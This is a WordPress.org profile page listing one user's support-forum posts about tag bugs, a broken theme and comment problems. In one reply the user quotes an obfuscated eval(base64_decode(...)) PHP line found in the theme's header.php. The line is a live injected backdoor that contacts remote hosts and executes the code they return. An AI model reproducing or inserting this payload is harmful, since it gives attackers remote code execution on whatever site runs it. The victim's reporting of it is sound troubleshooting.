WordPress.org

Profiles

Profile picture of
  • Member Since: March 5th, 2006
  • Find me on:

  • Posted a reply to "Post tags not working in 2.8.1", on the site WordPress Support Forums:
    Sorry patsy26, That doesn't fix anything for me. I don't have DB cache installed and…

    6 years ago

  • Posted a reply to "Tags missing after ugrade to 2.8.1", on the site WordPress Support Forums:
    Ditto here. I was redirected to this post from my forum post on this problem.…

    6 years ago

  • Created a topic, Post tags not working in 2.8.1, on the site WordPress Support Forums

    6 years ago

  • Posted a reply to "Theme's background color loads, but nothing else", on the site WordPress Support Forums:
    iridiax, Here it is in its entirety: <?php if ( function_exists('register_sidebar') ) register_sidebars(3);?>

    6 years ago

  • Posted a reply to "Warning at the top of page", on the site WordPress Support Forums:
    Wombo55, I ran into an obnoxious code snippet when I went through my header.php again.…

    6 years ago

  • Posted a reply to "Theme's background color loads, but nothing else", on the site WordPress Support Forums:
    stvwlf, That's what confuses me -- it does not appear in the original file on…

    6 years ago

  • Posted a reply to "Theme's background color loads, but nothing else", on the site WordPress Support Forums:
    Okay, I found the offending line: <?php eval(base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?> No idea whatsoever how it got…

    6 years ago

  • Posted a reply to "Theme's background color loads, but nothing else", on the site WordPress Support Forums:
    I've added my concern to another post, which seems similar to my current issue: http://wordpress.org/support/topic/268707?replies=5#post-1071788…

    6 years ago

  • Posted a reply to "Warning at the top of page", on the site WordPress Support Forums:
    Hi, I am running into a similar message with my site (http://cybersteward.net) after having it…

    6 years ago

  • Posted a reply to "Theme's background color loads, but nothing else", on the site WordPress Support Forums:
    I did the phpinfo file, but I couldn't locate a "memory limit" number in the…

    6 years ago

  • Posted a reply to "Theme's background color loads, but nothing else", on the site WordPress Support Forums:
    I have no recently installed plugins, but I did have the mobile plugin sitting there.…

    6 years ago

  • Created a topic, Theme's background color loads, but nothing else, on the site WordPress Support Forums

    6 years ago

  • Posted a reply to "Someone added Blu Host to my blogroll without me knowing anything about it", on the site WordPress Support Forums:
    I am having the same issue with the openbluhosting.com link showing up in my blogroll,…

    7 years ago

  • Posted a reply to "Comments disappearing (possibly closing)", on the site WordPress Support Forums:
    Thank you, Samboll. I am an idiot -- I don't know how I didn't notice…

    7 years ago

  • Created a topic, Comments disappearing (possibly closing), on the site WordPress Support Forums

    7 years ago

  • Created a topic, Syntax error on a previously working install of 2.7, on the site WordPress Support Forums

    7 years ago